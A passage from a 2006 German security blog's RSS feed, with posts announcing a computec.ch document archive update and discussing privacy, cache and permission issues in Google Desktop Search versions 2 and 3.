    Das Portal [1] computec enthält eine umfangreiche Dokumentessammlung Rund ums Thema Computersicherheit. In unregelmässigen Abständen werden alle Dokumente ich ein komprimiertes Archiv gepackt und auf verschiedenen FTP und Webservern zum downloaden angeboten. [2] In den nächsten Tagen wird eine solche Aktualisierung wieder online geschaltet werden. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[1]: &lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=37&amp;amp;entry_id=31&quot;  onmouseover=&quot;window.status=&#039;http://www.computec.ch&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;  title=&quot;Computec.ch&quot;&gt;www.computec.ch&lt;/a&gt;&lt;br /&gt;
[2]: &lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=38&amp;amp;entry_id=31&quot;  onmouseover=&quot;window.status=&#039;http://computec.burgernet.org&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;  title=&quot;http://computec.burgernet.org&quot;&gt;http://computec.burgernet.org&lt;/a&gt;&lt;br /&gt;
 
    </content:encoded>

    <pubDate>Sun, 05 Mar 2006 17:12:20 +0100</pubDate>
    <guid isPermaLink="false">http://weblog.burgernet.org/index.php?/archives/31-guid.html</guid>
    
</item>
<item>
    <title>Google Desktop Search Version  3 / 2</title>
    <link>http://weblog.burgernet.org/index.php?/archives/29-Google-Desktop-Search-Version-3-2.html</link>
            <category>Security</category>
    
    <comments>http://weblog.burgernet.org/index.php?/archives/29-Google-Desktop-Search-Version-3-2.html#comments</comments>
    <wfw:comment>http://weblog.burgernet.org/wfwcomment.php?cid=29</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://weblog.burgernet.org/rss.php?version=2.0&amp;type=comments&amp;cid=29</wfw:commentRss>
    

    <author>nospam@example.com (Karsten)</author>
    <content:encoded>
    [3] Blogeintrag zu Version 2&lt;br /&gt;
Das wohl bekannteste Suchtool ist in Version 3 erschienen [1]. Bis jetzt aber erst als „Beta“ Version in Englisch. Neu sollen auch Inhalte von anderen Rechnern durchsucht werden können, diese stehen dank einer verschlüsselten Zwischenspeicherung auch offline zur Verfügung. Die Problematik wird in diesem Bericht beschrieben [3]. Ob noch weitere Problematiken enthalten sind, ist bis jetzt noch nicht bekannt.&lt;br /&gt;
 &lt;br /&gt;
Einige Problematiken aus der Version 2 bleiben bestehen. Ich möchte noch einige Probleme aus der Version 2 die Lösung bekannt geben.&lt;br /&gt;
&lt;br /&gt;
Benötigt lokale Administrationsrechte:&lt;br /&gt;
Dies ist nicht so, das Problem liegt legendlich bei den Berechtigungen auf dem Cache Ordner (Google Desktop Search Cache o.Ä). Fügen Sie „jeder“ mit Vollzugriff hinzu. Auf die Unterordner sollten nur die Besitzer zugriff haben. &lt;br /&gt;
&lt;br /&gt;
Cache Kopieren auf einen anderen Rechner:&lt;br /&gt;
Mit den oben beschriebenen Massnahmen wird auch dieses Problem gelöst. Auf den persönlichen Cache Ordner (josdf98 oder so) hat nur der entsprechende User zugriff. &lt;br /&gt;
&lt;br /&gt;
[1] &lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=29&amp;amp;entry_id=29&quot;  onmouseover=&quot;window.status=&#039;http://desktop.google.com/en&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;  title=&quot;Google Desktop Search 3&quot;&gt;http://desktop.google.com/en&lt;/a&gt;&lt;br /&gt;
[2] &lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=30&amp;amp;entry_id=29&quot;  onmouseover=&quot;window.status=&#039;http://www.testticker.de/news/security/news20060210017.aspx&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;  title=&quot;Testticker&quot;&gt;http://www.testticker.de/news/security/news20060210017.aspx&lt;/a&gt;&lt;br /&gt;
[3] &lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=31&amp;amp;entry_id=29&quot;  onmouseover=&quot;window.status=&#039;http://weblog.burgernet.org/index.php?/archives/19-Google-Desktop-Search.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;  title=&quot;Weblog Eintrag Version 2&quot;&gt;http://weblog.burgernet.org/index.php?/archives/19-Google-Desktop-Search.html&lt;/a&gt;&lt;br /&gt;
 
    </content:encoded>

    <pubDate>Mon, 13 Feb 2006 11:56:30 +0100</pubDate>
    <guid isPermaLink="false">http://weblog.burgernet.org/index.php?/archives/29-guid.html</guid>
    
</item>
<item>
    <title>Google Desktop Search</title>
    <link>http://weblog.burgernet.org/index.php?/archives/19-Google-Desktop-Search.html</link>
            <category>Security</category>
    
    <comments>http://weblog.burgernet.org/index.php?/archives/19-Google-Desktop-Search.html#comments</comments>
    <wfw:comment>http://weblog.burgernet.org/wfwcomment.php?cid=19</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://weblog.burgernet.org/rss.php?version=2.0&amp;type=comments&amp;cid=19</wfw:commentRss>
    

    <author>nospam@example.com (Karsten)</author>
    <content:encoded>
    Das Tool Google Desktop Search ist unumstritten ein leistungsfähiges Werkzeug. Leider sind aber einige Nachteile bzw. Bedenken zu beachten. Das Tool legt auf dem lokalen Rechner einen Cache ab. Dieser Cache kann auf einen anderen Rechner übertragen werden. Daraus folgt, dass der Fileinhalt auch auf dem potenziell unsicheren Rechner betrachtet und rekonstruiert werden kann. Eine Massnahme bietet die Option Cache verschlüsseln, jedoch ist dies ziemlich Rechenintensiv und schlägt auf die allgemeine Performace.&lt;br /&gt;&lt;br /&gt;Ob das Tool nach „Hause“ telefoniert ist noch umstritten. Nach Aussage von Google nur um unpersönliche Informationen (Programmabstürze) zu übermitteln. Dies soll den Entwicklern helfen das Werkzeug zu verbessern. Meldungen die das Gegenteil beweisen, sind mir bis jetzt noch nicht bekannt. &lt;br /&gt;&lt;br /&gt;Auf meinem Testrechner werden lokale Administrationsrechte benötigt um das Tool überhaupt zu verwenden. &lt;br /&gt;&lt;br /&gt;Die Benutzereinstellungen können in keiner Weise für unbefugte blockiert werden. Daher für einen Unternehmenseinsatz eher ungeeignet. Eine spezielle Enterprise Edition [1] bietet eine MSI-Installation und Ansprechbarkeit via GPO. &lt;br /&gt;&lt;br /&gt;Eine schon seit der Beta bekannten Sicherheitslücke ist in der aktuellen Version geschlossen. [2]&lt;br /&gt;&lt;br /&gt;Dokumente zur Betaversion:&lt;br /&gt;&lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=21&amp;amp;entry_id=19&quot; title=&quot;http://www.heise.de/tp/r4/artikel/18/18603/1.html&quot;  onmouseover=&quot;window.status=&#039;http://www.heise.de/tp/r4/artikel/18/18603/1.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Heise Artikel&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=22&amp;amp;entry_id=19&quot; title=&quot;http://desktop.google.com/&quot;  onmouseover=&quot;window.status=&#039;http://desktop.google.com/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Google Desktop Search downloaden&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[1]&lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=24&amp;amp;entry_id=19&quot; title=&quot;http://desktop.google.com/enterprise/index.html&quot;  onmouseover=&quot;window.status=&#039;http://desktop.google.com/enterprise/index.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Enterprise Edition&lt;/a&gt;&lt;br /&gt;[2]&lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=24&amp;amp;entry_id=19&quot; title=&quot;http://desktop.google.com/enterprise/index.html&quot;  onmouseover=&quot;window.status=&#039;http://desktop.google.com/enterprise/index.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Sicherheitslücke&lt;/a&gt; 
    </content:encoded>

    <pubDate>Mon, 16 Jan 2006 17:20:31 +0100</pubDate>
    <guid isPermaLink="false">http://weblog.burgernet.org/index.php?/archives/19-guid.html</guid>
    
</item>

</channel>
</rss>